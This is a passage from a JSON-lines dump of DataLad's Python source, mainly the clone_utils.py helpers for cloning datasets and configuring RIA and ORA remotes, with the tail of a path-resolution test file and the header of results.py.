OK\n eq_(resolve_path([d, d]), [Path(d), Path(d)])\n\n with chpwd(d):\n # be aware: knows about cwd, but this CWD has symlinks resolved\n eq_(str(resolve_path(d).cwd()), opath)\n # using pathlib's `resolve()` will resolve any\n # symlinks\n # also resolve `opath`, as on old windows systems the path might\n # come in crippled (e.g. 
C:\\Users\\MIKE~1/...)\n # and comparison would fails unjustified\n eq_(resolve_path('.').resolve(), ut.Path(opath).resolve())\n # no norming, but absolute paths, without resolving links\n eq_(resolve_path('.'), ut.Path(d))\n eq_(str(resolve_path('.')), d)\n\n # there is no concept of an \"explicit\" relative path anymore\n # relative is relative, regardless of the specific syntax\n eq_(resolve_path(op.join(os.curdir, 'bu'), ds=ds_global),\n ds_global.pathobj / 'bu')\n # there is no full normpath-ing or other funky resolution of\n # parent directory back-reference\n eq_(str(resolve_path(op.join(os.pardir, 'bu'), ds=ds_global)),\n op.join(ds_global.path, os.pardir, 'bu'))\n\n # resolve against a dataset given as a path/str\n # (cmdline input scenario)\n eq_(resolve_path('bu', ds=ds_local.path), Path.cwd() / 'bu')\n eq_(resolve_path('bu', ds=ds_global.path), Path.cwd() / 'bu')\n # resolve against a dataset given as a dataset instance\n # (object method scenario)\n eq_(resolve_path('bu', ds=ds_local), ds_local.pathobj / 'bu')\n eq_(resolve_path('bu', ds=ds_global), ds_global.pathobj / 'bu')\n # not being inside a dataset doesn't change the resolution result\n eq_(resolve_path(op.join(os.curdir, 'bu'), ds=ds_global),\n ds_global.pathobj / 'bu')\n eq_(str(resolve_path(op.join(os.pardir, 'bu'), ds=ds_global)),\n op.join(ds_global.path, os.pardir, 'bu'))\n\n\n# little brother of the test above, but actually (must) run\n# under any circumstances\n@with_tempfile(mkdir=True)\ndef test_resolve_path_symlink_edition(path=None):\n deepest = ut.Path(path) / 'one' / 'two' / 'three'\n deepest_str = str(deepest)\n os.makedirs(deepest_str)\n with chpwd(deepest_str):\n # direct absolute\n eq_(deepest, resolve_path(deepest))\n eq_(deepest, resolve_path(deepest_str))\n # explicit direct relative\n eq_(deepest, resolve_path('.'))\n eq_(deepest, resolve_path(op.join('.', '.')))\n eq_(deepest, resolve_path(op.join('..', 'three')))\n eq_(deepest, resolve_path(op.join('..', '..', 'two', 'three')))\n eq_(deepest, resolve_path(op.join('..', '..', '..',\n 'one', 'two', 'three')))\n # weird ones\n eq_(deepest, resolve_path(op.join('..', '.', 'three')))\n eq_(deepest, resolve_path(op.join('..', 'three', '.')))\n eq_(deepest, resolve_path(op.join('..', 'three', '.')))\n eq_(deepest, resolve_path(op.join('.', '..', 'three')))\n\n\n@with_tempfile(mkdir=True)\ndef test_hashable(path=None):\n path = ut.Path(path)\n tryme = set()\n # is it considered hashable at all\n tryme.add(Dataset(path / 'one'))\n eq_(len(tryme), 1)\n # do another one, same class different path\n tryme.add(Dataset(path / 'two'))\n eq_(len(tryme), 2)\n # test whether two different types of repo instances pointing\n # to the same repo on disk are considered different\n Dataset(path).create()\n tryme.add(GitRepo(path))\n eq_(len(tryme), 3)\n tryme.add(AnnexRepo(path))\n eq_(len(tryme), 4)\n" }, { "alpha_fraction": 0.5777581334114075, "alphanum_fraction": 0.5797721147537231, "avg_line_length": 39.185142517089844, "blob_id": "c93ecd916136eb8fc5ab0dddb4a2667deb9a32fd", "content_id": "b0682822a88bef9cd6e7707bc64920efd8963456", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36247, "license_type": "permissive", "max_line_length": 87, "num_lines": 902, "path": "/datalad/core/distributed/clone_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Helpers used in the clone.py patch\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport 
re\nfrom os.path import expanduser\nfrom pathlib import Path\nfrom typing import (\n Dict,\n List,\n Tuple,\n)\nfrom urllib.parse import unquote as urlunquote\n\nfrom datalad.cmd import (\n CommandError,\n GitWitlessRunner,\n StdOutCapture,\n)\nfrom datalad.config import ConfigManager\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n RIARemoteError,\n SSHRemoteIO,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.distribution.utils import _get_flexible_source_candidates\nfrom datalad.dochelpers import single_or_plural\nfrom datalad.log import log_progress\nfrom datalad.runner.exception import CommandError\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n DownloadError\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import (\n RI,\n SSHRI,\n URL,\n DataLadRI,\n download_url,\n get_local_file_url,\n is_url,\n)\nfrom datalad.support.strings import get_replacement_dict\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n ensure_bool,\n ensure_list,\n make_tempfile,\n rmtree,\n)\n\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef postclone_preannex_cfg_ria(ds, remote=\"origin\"):\n\n # We need to annex-ignore the remote before annex-init is called on the clone,\n # due to issues 5186 and 5253 (and we would have done it afterwards anyway).\n # annex/objects in RIA stores is special for several reasons.\n # 1. the remote doesn't know about it (no actual local annex for the remote)\n # 2. RIA may use hashdir mixed, copying data to it via git-annex (if cloned\n # via ssh or local) would make it see a bare repo and establish a\n # hashdir lower annex object tree.\n # 3. We want the ORA remote to receive all data for the store, so its\n # objects could be moved into archives (the main point of a RIA store).\n\n # Note, that this function might need an enhancement as theoretically a RIA\n # store could also hold simple standard annexes w/o an intended ORA remote.\n # This needs the introduction of a new version label in RIA datasets, making\n # the following call conditional.\n ds.config.set(f'remote.{remote}.annex-ignore', 'true', scope='local')\n\n\ndef postclonecfg_ria(ds, props, remote=\"origin\"):\n \"\"\"Configure a dataset freshly cloned from a RIA store\"\"\"\n repo = ds.repo\n\n def get_uuid_from_store(store_url):\n # First figure whether we cloned via SSH, HTTP or local path and then\n # get that config file the same way:\n config_content = None\n scheme = store_url.split(':', 1)[0]\n if scheme in ['http', 'https']:\n try:\n config_content = download_url(\n \"{}{}config\".format(\n store_url,\n '/' if not store_url.endswith('/') else ''))\n except DownloadError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source:\\n%s\", ce)\n elif scheme == 'ssh':\n # TODO: switch the following to proper command abstraction:\n # SSHRemoteIO ignores the path part ATM. No remote CWD! (To be\n # changed with command abstractions). 
So we need to get that part to\n # have a valid path to the remote's config file:\n cfg_path = PurePosixPath(URL(store_url).path) / 'config'\n io = SSHRemoteIO(store_url)\n try:\n config_content = io.read_file(cfg_path)\n except RIARemoteError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source: %s\", ce)\n\n elif scheme == 'file':\n # TODO: switch the following to proper command abstraction:\n io = LocalIO()\n cfg_path = Path(URL(store_url).localpath) / 'config'\n try:\n config_content = io.read_file(cfg_path)\n except (RIARemoteError, OSError) as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source: %s\", ce)\n else:\n lgr.debug(\"Unknown URL-Scheme %s in %s. Can handle SSH, HTTP or \"\n \"FILE scheme URLs.\", scheme, props['source'])\n\n # And read it\n uuid = None\n if config_content:\n runner = GitWitlessRunner()\n try:\n # \"git config -f -\" can read from stdin; this spares us a\n # temp file\n result = runner.run(\n ['git', 'config', '-f', '-', 'datalad.ora-remote.uuid'],\n stdin=config_content.encode(encoding='utf-8'),\n protocol=StdOutCapture\n )\n uuid = result['stdout'].strip()\n except CommandError as e:\n ce = CapturedException(e)\n # doesn't contain what we are looking for\n lgr.debug(\"Found no UUID for ORA special remote at \"\n \"'%s' (%s)\", remote, ce)\n\n return uuid\n\n\n\n\n # chances are that if this dataset came from a RIA store, its subdatasets\n # may live there too. Place a subdataset source candidate config that makes\n # get probe this RIA store when obtaining subdatasets\n ria_store_url = props['source'].split('#', maxsplit=1)[0]\n ds.config.set(\n # we use the label 'origin' for this candidate in order to not have to\n # generate a complicated name from the actual source specification.\n # we pick a cost of 200 to sort it before datalad's default candidates\n # for non-RIA URLs, because they prioritize hierarchical layouts that\n # cannot be found in a RIA store\n 'datalad.get.subdataset-source-candidate-200origin',\n # use the entire original URL, up to the fragment + plus dataset ID\n # placeholder, this should make things work with any store setup we\n # support (paths, ports, ...)\n ria_store_url + '#{id}',\n scope='local')\n\n # setup publication dependency, if a corresponding special remote exists\n # and was enabled (there could be RIA stores that actually only have repos)\n # make this function be a generator\n ora_remotes = [s for s in ds.siblings('query', result_renderer='disabled')\n if s.get('annex-externaltype') == 'ora']\n # get full special remotes' config for access to stored URL\n srs = repo.get_special_remotes() \\\n if hasattr(repo, 'get_special_remotes') else dict()\n\n has_only_disabled_ora = \\\n not ora_remotes and \\\n any(r.get('externaltype') == 'ora' for r in srs.values())\n\n def match_in_urls(special_remote_cfg, url_to_match):\n # Figure whether either `url` or `push-url` in an ORA remote's config\n # match a given URL (to a RIA store).\n return special_remote_cfg['url'].startswith(url_to_match) or \\\n (special_remote_cfg['push-url'].startswith(url_to_match)\n if 'push-url' in special_remote_cfg else False)\n\n no_enabled_ora_matches_url = \\\n all(not match_in_urls(srs[r['annex-uuid']], ria_store_url)\n for r in ora_remotes)\n\n if has_only_disabled_ora or no_enabled_ora_matches_url:\n\n # No ORA remote autoenabled, but configuration known about at least one,\n # or enabled ORA remotes seem to not match clone URL.\n # Let's check the remote's config for 
datalad.ora-remote.uuid as stored\n # by create-sibling-ria and try enabling that one.\n lgr.debug(\"Found no autoenabled ORA special remote. Trying to look it \"\n \"up in source config ...\")\n\n org_uuid = get_uuid_from_store(props['giturl'])\n\n # Now, enable it. If annex-init didn't fail to enable it as stored, we\n # wouldn't end up here, so enable with store URL as suggested by the URL\n # we cloned from.\n if org_uuid:\n if org_uuid in srs.keys():\n # TODO: - Double-check autoenable value and only do this when\n # true?\n # - What if still fails? -> Annex shouldn't change config\n # in that case\n\n # we only need the store:\n new_url = props['source'].split('#')[0]\n try:\n # local config to overwrite committed URL\n repo.config.set(\n f\"remote.{srs[org_uuid]['name']}.ora-url\",\n new_url, scope='local')\n repo.enable_remote(srs[org_uuid]['name'])\n lgr.info(\"Reconfigured %s for %s\",\n srs[org_uuid]['name'], new_url)\n # update ora_remotes for considering publication dependency\n # below\n ora_remotes = [s for s in\n ds.siblings('query',\n result_renderer='disabled')\n if s.get('annex-externaltype', None) ==\n 'ora']\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to reconfigure ORA special remote: %s\", ce)\n repo.config.unset(f\"remote.{srs[org_uuid]['name']}.ora-url\",\n scope='local')\n else:\n lgr.debug(\"Unknown ORA special remote uuid at '%s': %s\",\n remote, org_uuid)\n\n # Set publication dependency for `remote` on the respective ORA remote:\n if ora_remotes:\n url_matching_remotes = [r for r in ora_remotes\n if srs[r['annex-uuid']]['url'] == ria_store_url]\n\n if len(url_matching_remotes) == 1:\n # We have exactly one ORA remote with the same store URL we used for\n # cloning (includes previously reconfigured remote).\n # Set publication dependency:\n yield from ds.siblings('configure',\n name=remote,\n publish_depends=url_matching_remotes[0]['name'],\n result_filter=None,\n result_renderer='disabled')\n\n elif not url_matching_remotes:\n # No matches but we have successfully autoenabled ORA remotes. Could\n # be the same store accessed by different method (cloning via HTTP\n # but special remote access via SSH). We can confidently set\n # publication dependency if the store knows the UUID.\n org_uuid = get_uuid_from_store(props['giturl'])\n uuid_matching_remotes = [r for r in ora_remotes\n if r['annex-uuid'] == org_uuid]\n if uuid_matching_remotes:\n # Multiple uuid matches are actually possible via same-as.\n # However, in that case we can't decide which one is supposed to\n # be used with publishing to `remote`.\n if len(uuid_matching_remotes) == 1:\n yield from ds.siblings(\n 'configure',\n name=remote,\n publish_depends=uuid_matching_remotes[0]['name'],\n result_filter=None,\n result_renderer='disabled')\n else:\n lgr.warning(\n \"Found multiple matching ORA remotes. Couldn't decide \"\n \"which one publishing to '%s' should depend on: %s.\"\n \" Consider running 'datalad siblings configure -s \"\n \"%s --publish-depends ORAREMOTENAME' to set \"\n \"publication dependency manually.\",\n remote,\n [r['name'] for r in uuid_matching_remotes],\n remote)\n\n else:\n # We have multiple ORA remotes with the same store URL we cloned\n # from.\n lgr.warning(\"Found multiple matching ORA remotes. 
Couldn't decide \"\n \"which one publishing to '%s' should depend on: %s.\"\n \" Consider running 'datalad siblings configure -s \"\n \"%s --publish-depends ORAREMOTENAME' to set \"\n \"publication dependency manually.\",\n remote,\n [r['name'] for r in url_matching_remotes],\n remote)\n\n\ndef _get_url_mappings(cfg):\n cfg_prefix = 'datalad.clone.url-substitute.'\n # figure out which keys we should be looking for\n # in the active config\n subst_keys = set(k for k in cfg.keys() if k.startswith(cfg_prefix))\n # and in the common config specs\n from datalad.interface.common_cfg import definitions\n subst_keys.update(k for k in definitions if k.startswith(cfg_prefix))\n # TODO a potential sorting of substitution series could be implemented\n # here\n return [\n # decode the rule specifications\n get_replacement_dict(\n # one or more could come out\n ensure_list(\n cfg.get(\n k,\n # make sure to pull the default from the common config\n default=cfg.obtain(k),\n # we specifically support declaration of multiple\n # settings to build replacement chains\n get_all=True)))\n for k in subst_keys\n ]\n\n\ndef _get_installationpath_from_url(url):\n \"\"\"Returns a relative path derived from the trailing end of a URL\n\n This can be used to determine an installation path of a Dataset\n from a URL, analog to what `git clone` does.\n \"\"\"\n ri = RI(url)\n if isinstance(ri, (URL, DataLadRI, SSHRI)): # decode only if URL\n path = ri.path.rstrip('/')\n path = urlunquote(path) if path else ri.hostname\n if '/' in path:\n path = path.split('/')\n if path[-1] == '.git':\n path = path[-2]\n else:\n path = path[-1]\n else:\n path = Path(url).parts[-1]\n if path.endswith('.git'):\n path = path[:-4]\n return path\n\n\ndef decode_source_spec(spec, cfg=None):\n \"\"\"Decode information from a clone source specification\n\n Parameters\n ----------\n spec : str\n Any supported clone source specification\n cfg : ConfigManager, optional\n Configuration will be queried from the instance (i.e. from a particular\n dataset). If None is given, the global DataLad configuration will be\n queried.\n\n Returns\n -------\n dict\n The value of each decoded property is stored under its own key in this\n dict. 
By default the following keys are return: 'type', a specification\n type label {'giturl', 'dataladri', 'ria'}; 'source' the original\n source specification; 'giturl' a URL for the source that is a suitable\n source argument for git-clone; 'version' a version-identifer, if present\n (None else); 'default_destpath' a relative path that that can be used as\n a clone destination.\n \"\"\"\n if cfg is None:\n from datalad import cfg\n # standard property dict composition\n props = dict(\n source=spec,\n version=None,\n )\n\n # Git never gets to see these URLs, so let's manually apply any\n # rewrite configuration Git might know about.\n # Note: We need to rewrite before parsing, otherwise parsing might go wrong.\n # This is particularly true for insteadOf labels replacing even the URL\n # scheme.\n spec = cfg.rewrite_url(spec)\n # common starting point is a RI instance, support for accepting an RI\n # instance is kept for backward-compatibility reasons.\n # this conversion will raise ValueError for any unrecognized RI\n source_ri = RI(spec) if not isinstance(spec, RI) else spec\n\n # scenario switch, each case must set 'giturl' at the very minimum\n if isinstance(source_ri, DataLadRI):\n # we have got our DataLadRI as the source, so expand it\n props['type'] = 'dataladri'\n props['giturl'] = source_ri.as_git_url()\n elif isinstance(source_ri, URL) and source_ri.scheme.startswith('ria+'):\n # parse a RIA URI\n dsid, version = source_ri.fragment.split('@', maxsplit=1) \\\n if '@' in source_ri.fragment else (source_ri.fragment, None)\n uuid_regex = r'[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'\n if re.match(uuid_regex, dsid):\n trace = '{}/{}'.format(dsid[:3], dsid[3:])\n default_destpath = dsid\n elif dsid.startswith('~'):\n trace = 'alias/{}'.format(dsid[1:])\n default_destpath = dsid[1:]\n else:\n raise ValueError(\n 'RIA URI not recognized, no valid dataset ID or other supported '\n 'scheme: {}'.format(spec))\n # now we cancel the fragment in the original URL, but keep everything else\n # in order to be able to support the various combinations of ports, paths,\n # and everything else\n source_ri.fragment = ''\n # strip the custom protocol and go with standard one\n source_ri.scheme = source_ri.scheme[4:]\n # take any existing path, and add trace to dataset within the store\n source_ri.path = '{urlpath}{urldelim}{trace}'.format(\n urlpath=source_ri.path if source_ri.path else '',\n urldelim='' if not source_ri.path or source_ri.path.endswith('/') else '/',\n trace=trace,\n )\n props.update(\n type='ria',\n giturl=str(source_ri),\n version=version,\n default_destpath=default_destpath,\n )\n else:\n # let's assume that anything else is a URI that Git can handle\n props['type'] = 'giturl'\n # use original input verbatim\n props['giturl'] = spec\n\n if 'default_destpath' not in props:\n # if we still have no good idea on where a dataset could be cloned to if no\n # path was given, do something similar to git clone and derive the path from\n # the source\n props['default_destpath'] = _get_installationpath_from_url(props['giturl'])\n\n return props\n\n\ndef _map_urls(cfg, urls):\n mapping_specs = _get_url_mappings(cfg)\n if not mapping_specs:\n return urls\n\n mapped = []\n # we process the candidate in order to maintain any prioritization\n # encoded in it (e.g. 
_get_flexible_source_candidates_for_submodule)\n # if we have a matching mapping replace the URL in its position\n for u in urls:\n # we only permit a single match\n # TODO we likely want to RF this to pick the longest match\n mapping_applied = False\n # try one mapping set at a time\n for mapping_spec in mapping_specs:\n # process all substitution patterns in the specification\n # always operate on strings (could be a Path instance too)\n mu = str(u)\n matched = False\n for match_ex, subst_ex in mapping_spec.items():\n if not matched:\n matched = re.match(match_ex, mu) is not None\n if not matched:\n break\n # try to map, would return unchanged, if there is no match\n mu = re.sub(match_ex, subst_ex, mu)\n if mu != u:\n lgr.debug(\"URL substitution: '%s' -> '%s'\", u, mu)\n mapped.append(mu)\n # we could consider breaking after the for effective mapping\n # specification. however, that would mean any generic\n # definition of a broadly matching substitution would derail\n # the entroe system. moreover, suddently order would matter\n # substantially\n mapping_applied = True\n if not mapping_applied:\n # none of the mappings matches, go with the original URL\n # (really original, not the stringified one)\n mapped.append(u)\n return mapped\n\n\ndef _get_tracking_source(ds):\n \"\"\"Returns name and url of a potential configured source\n tracking remote\"\"\"\n vcs = ds.repo\n # if we have a remote, let's check the location of that remote\n # for the presence of the desired submodule\n\n remote_name, tracking_branch = vcs.get_tracking_branch()\n if not remote_name and isinstance(vcs, AnnexRepo):\n # maybe cloned from a source repo that was in adjusted mode\n # https://github.com/datalad/datalad/issues/3969\n remote_name, tracking_branch = vcs.get_tracking_branch(\n corresponding=False)\n # TODO: better default `None`? Check where we might rely on '':\n remote_url = ''\n if remote_name:\n remote_url = vcs.get_remote_url(remote_name, push=False)\n\n return remote_name, remote_url\n\n\ndef _generate_candidate_clone_sources(\n destds: Dataset,\n srcs: List,\n cfg: ConfigManager or None) -> List:\n \"\"\"Convert \"raw\" clone source specs to candidate URLs\n\n Returns\n -------\n Each item in the list is a dictionary with clone candidate properties.\n At minimum each dictionary contains a 'giturl' property, with a URL\n value suitable for passing to `git-clone`. Other properties are\n provided by `decode_source_spec()` and are documented there.\n \"\"\"\n # check for configured URL mappings, either in the given config manager\n # or in the one of the destination dataset, which is typically not existent\n # yet and the process config is then used effectively\n srcs = _map_urls(cfg or destds.config, srcs)\n\n # decode all source candidate specifications\n # use a given config or pass None to make it use the process config\n # manager. Theoretically, we could also do\n # `cfg or destds.config` as done above, but some tests patch\n # the process config manager\n candidate_sources = [decode_source_spec(s, cfg=cfg) for s in srcs]\n\n # now expand the candidate sources with additional variants of the decoded\n # giturl, while duplicating the other properties in the additional records\n # for simplicity. 
The hope is to overcome a few corner cases and be more\n # robust than git clone\n return [\n dict(props, giturl=s) for props in candidate_sources\n for s in _get_flexible_source_candidates(props['giturl'])\n ]\n\n\ndef _test_existing_clone_target(\n destds: Dataset,\n candidate_sources: List) -> Tuple:\n \"\"\"Check if the clone target exists, inspect it, if so\n\n Returns\n -------\n (bool, dict or None)\n A flag whether the target exists, and either a dict with properties\n of a result that should be yielded before an immediate return, or\n None, if the processing can continue\n \"\"\"\n # important test! based on this `rmtree` will happen below after\n # failed clone\n dest_path = destds.pathobj\n dest_path_existed = dest_path.exists()\n if dest_path_existed and any(dest_path.iterdir()):\n if destds.is_installed():\n # check if dest was cloned from the given source before\n # this is where we would have installed this from\n # this is where it was actually installed from\n track_name, track_url = _get_tracking_source(destds)\n try:\n # this will get us track_url in system native path conventions,\n # whenever it is a path (and not a URL)\n # this is needed to match it to any potentially incoming local\n # source path in the 'notneeded' test below\n track_path = str(Path(track_url))\n except Exception as e:\n CapturedException(e)\n # this should never happen, because Path() will let any non-path\n # stringification pass through unmodified, but we do not want any\n # potential crash due to pathlib behavior changes\n lgr.debug(\"Unexpected behavior of pathlib!\")\n track_path = None\n for cand in candidate_sources:\n src = cand['giturl']\n if track_url == src \\\n or (not is_url(track_url)\n and get_local_file_url(\n track_url, compatibility='git') == src) \\\n or track_path == expanduser(src):\n return dest_path_existed, dict(\n status='notneeded',\n message=(\"dataset %s was already cloned from '%s'\",\n destds,\n src),\n )\n # anything else is an error\n return dest_path_existed, dict(\n status='error',\n message='target path already exists and not empty, '\n 'refuse to clone into target path',\n )\n # found no reason to stop, i.e. 
empty target dir\n return dest_path_existed, None\n\n\ndef _try_clone_candidates(\n *,\n destds: Dataset,\n candidate_sources: List,\n clone_opts: List,\n dest_path_existed: bool) -> Tuple:\n \"\"\"Iterate over candidate URLs and attempt a clone\n\n Parameters\n ----------\n destds: Dataset\n The target dataset the clone should materialize at.\n candidate_sources: list\n Each value is a dict with properties, as returned by\n `_generate_candidate_clone_sources()`\n clone_opts: list\n Options to be passed on to `_try_clone_candidate()`\n dest_path_existed: bool\n Flag whether the target path existed before attempting a clone.\n\n Returns\n -------\n (dict or None, dict, dict or None)\n The candidate record of the last clone attempt,\n a mapping of candidate URLs to potential error messages they yielded,\n and either a dict with properties of a result that should be yielded\n before an immediate return, or None, if the processing can continue\n \"\"\"\n log_progress(\n lgr.info,\n 'cloneds',\n 'Attempting a clone into %s', destds.path,\n unit=' candidates',\n label='Cloning',\n total=len(candidate_sources),\n )\n error_msgs = dict() # accumulate all error messages formatted per each url\n for cand in candidate_sources:\n log_progress(\n lgr.info,\n 'cloneds',\n 'Attempting to clone from %s to %s', cand['giturl'], destds.path,\n update=1,\n increment=True)\n\n tried_url, error, fatal = _try_clone_candidate(\n destds=destds,\n cand=cand,\n clone_opts=clone_opts,\n )\n\n if error is not None:\n lgr.debug(\"Failed to clone from URL: %s (%s)\",\n tried_url, error)\n\n error_msgs[tried_url] = error\n\n # ready playing field for the next attempt\n if destds.pathobj.exists():\n lgr.debug(\"Wiping out unsuccessful clone attempt at: %s\",\n destds.path)\n # We must not just rmtree since it might be curdir etc\n # we should remove all files/directories under it\n # TODO stringification can be removed once patlib compatible\n # or if PY35 is no longer supported\n rmtree(destds.path, children_only=dest_path_existed)\n\n if fatal:\n # cancel progress bar\n log_progress(\n lgr.info,\n 'cloneds',\n 'Completed clone attempts for %s', destds\n )\n return cand, error_msgs, fatal\n\n if error is None:\n # do not bother with other sources if succeeded\n break\n\n log_progress(\n lgr.info,\n 'cloneds',\n 'Completed clone attempts for %s', destds\n )\n return cand, error_msgs, None\n\n\ndef _try_clone_candidate(\n *,\n destds: Dataset,\n cand: Dict,\n clone_opts: List) -> Tuple:\n \"\"\"Attempt a clone from a single candidate\n\n destds: Dataset\n The target dataset the clone should materialize at.\n candidate_sources: list\n Each value is a dict with properties, as returned by\n `_generate_candidate_clone_sources()`\n clone_opts: list\n Options to be passed on to `_try_clone_candidate()`\n\n Returns\n -------\n (str, str or None, dict or None)\n The first item is the effective URL a clone was attempted from.\n The second item is `None` if the clone was successful, or an\n error message, detailing the failure for the specific URL.\n If the third item is not `None`, it must be a result dict that\n should be yielded, and no further clone attempt (even when\n other candidates remain) will be attempted.\n \"\"\"\n # right now, we only know git-clone based approaches\n return _try_git_clone_candidate(\n destds=destds,\n cand=cand,\n clone_opts=clone_opts,\n )\n\n\ndef _try_git_clone_candidate(\n *,\n destds: Dataset,\n cand: Dict,\n clone_opts: List) -> Tuple:\n \"\"\"_try_clone_candidate() using `git-clone`\n\n 
Parameters and return value behavior is as described in\n `_try_clone_candidate()`.\n \"\"\"\n if cand.get('version', None):\n opts = clone_opts + [\"--branch=\" + cand['version']]\n else:\n opts = clone_opts\n\n try:\n GitRepo.clone(\n path=destds.path,\n url=cand['giturl'],\n clone_options=opts,\n create=True)\n\n except CommandError as e:\n ce = CapturedException(e)\n e_stderr = e.stderr\n\n # MIH thinks this should rather use any of ce's message generating\n # methods, but kept it to avoid behavior changes\n error_msg = e\n\n if e_stderr and 'could not create work tree' in e_stderr.lower():\n # this cannot be fixed by trying another URL\n re_match = re.match(r\".*fatal: (.*)$\", e_stderr,\n flags=re.MULTILINE | re.DOTALL)\n # existential failure\n return cand['giturl'], error_msg, dict(\n status='error',\n message=re_match.group(1).strip()\n if re_match else \"stderr: \" + e_stderr,\n )\n\n # failure for this URL\n return cand['giturl'], error_msg, None\n\n # success\n return cand['giturl'], None, None\n\n\ndef _format_clone_errors(\n destds: Dataset,\n error_msgs: List,\n last_clone_url: str) -> Tuple:\n \"\"\"Format all accumulated clone errors across candidates into one message\n\n Returns\n -------\n (str, list)\n Message body and string formatting arguments for it.\n \"\"\"\n if len(error_msgs):\n if all(not e.stdout and not e.stderr for e in error_msgs.values()):\n # there is nothing we can learn from the actual exception,\n # the exit code is uninformative, the command is predictable\n error_msg = \"Failed to clone from all attempted sources: %s\"\n error_args = list(error_msgs.keys())\n else:\n error_msg = \"Failed to clone from any candidate source URL. \" \\\n \"Encountered errors per each url were:\\n- %s\"\n error_args = '\\n- '.join(\n '{}\\n {}'.format(url, exc.to_str())\n for url, exc in error_msgs.items()\n )\n else:\n # yoh: Not sure if we ever get here but I felt that there could\n # be a case when this might happen and original error would\n # not be sufficient to troubleshoot what is going on.\n error_msg = \"Awkward error -- we failed to clone properly. \" \\\n \"Although no errors were encountered, target \" \\\n \"dataset at %s seems to be not fully installed. \" \\\n \"The 'succesful' source was: %s\"\n error_args = (destds.path, last_clone_url)\n return error_msg, error_args\n\n\ndef _get_remote(repo: GitRepo) -> str:\n \"\"\"Return the name of the remote of a freshly clones repo\n\n Raises\n ------\n RuntimeError\n In case there is no remote, which should never happen.\n \"\"\"\n remotes = repo.get_remotes(with_urls_only=True)\n nremotes = len(remotes)\n if nremotes == 1:\n remote = remotes[0]\n lgr.debug(\"Determined %s to be remote of %s\", remote, repo)\n elif remotes > 1:\n lgr.warning(\n \"Fresh clone %s unexpected has multiple remotes: %s. Using %s\",\n repo.path, remotes, remotes[0])\n remote = remotes[0]\n else:\n raise RuntimeError(\"bug: fresh clone has zero remotes\")\n return remote\n\n\ndef _check_autoenable_special_remotes(repo: AnnexRepo):\n \"\"\"Check and report on misconfigured/dysfunctional special remotes\n \"\"\"\n srs = {True: [], False: []} # special remotes by \"autoenable\" key\n remote_uuids = None # might be necessary to discover known UUIDs\n\n repo_config = repo.config\n for uuid, config in repo.get_special_remotes().items():\n sr_name = config.get('name', None)\n if sr_name is None:\n lgr.warning(\n 'Ignoring special remote %s because it does not have a name. 
'\n 'Known information: %s',\n uuid, config)\n continue\n sr_autoenable = config.get('autoenable', False)\n try:\n sr_autoenable = ensure_bool(sr_autoenable)\n except ValueError as e:\n CapturedException(e)\n lgr.warning(\n 'Failed to process \"autoenable\" value %r for sibling %s in '\n 'dataset %s as bool. '\n 'You might need to enable it later manually and/or fix it up '\n 'to avoid this message in the future.',\n sr_autoenable, sr_name, repo.path)\n continue\n\n # If it looks like a type=git special remote, make sure we have up to\n # date information. See gh-2897.\n if sr_autoenable and repo_config.get(\n \"remote.{}.fetch\".format(sr_name)):\n try:\n repo.fetch(remote=sr_name)\n except CommandError as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to fetch type=git special remote %s: %s\",\n sr_name, ce)\n\n # determine whether there is a registered remote with matching UUID\n if uuid:\n if remote_uuids is None:\n remote_uuids = {\n # Check annex-config-uuid first. For sameas annex remotes,\n # this will point to the UUID for the configuration (i.e.\n # the key returned by get_special_remotes) rather than the\n # shared UUID.\n (repo_config.get('remote.%s.annex-config-uuid' % r) or\n repo_config.get('remote.%s.annex-uuid' % r))\n for r in repo.get_remotes()\n }\n if uuid not in remote_uuids:\n srs[sr_autoenable].append(sr_name)\n\n if srs[True]:\n lgr.debug(\n \"configuration for %s %s added because of autoenable,\"\n \" but no UUIDs for them yet known for dataset %s\",\n # since we are only at debug level, we could call things their\n # proper names\n single_or_plural(\"special remote\",\n \"special remotes\", len(srs[True]), True),\n \", \".join(srs[True]),\n repo.path\n )\n\n if srs[False]:\n # if has no auto-enable special remotes\n lgr.info(\n 'access to %s %s not auto-enabled, enable with:\\n'\n '\\t\\tdatalad siblings -d \"%s\" enable -s %s',\n # but since humans might read it, we better confuse them with our\n # own terms!\n single_or_plural(\"dataset sibling\",\n \"dataset siblings\", len(srs[False]), True),\n \", \".join(srs[False]),\n repo.path,\n srs[False][0] if len(srs[False]) == 1 else \"SIBLING\",\n )\n" }, { "alpha_fraction": 0.6163566708564758, "alphanum_fraction": 0.6174296736717224, "avg_line_length": 35.469566345214844, "blob_id": "4559b354f8d290b8b642c0aea9d18bf950b6b2cf", "content_id": "c5c5567e244e5e18571eabc20eaf13f4880aead5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16776, "license_type": "permissive", "max_line_length": 104, "num_lines": 460, "path": "/datalad/interface/results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface result handling functions\n\n\"\"\"\n\nfrom 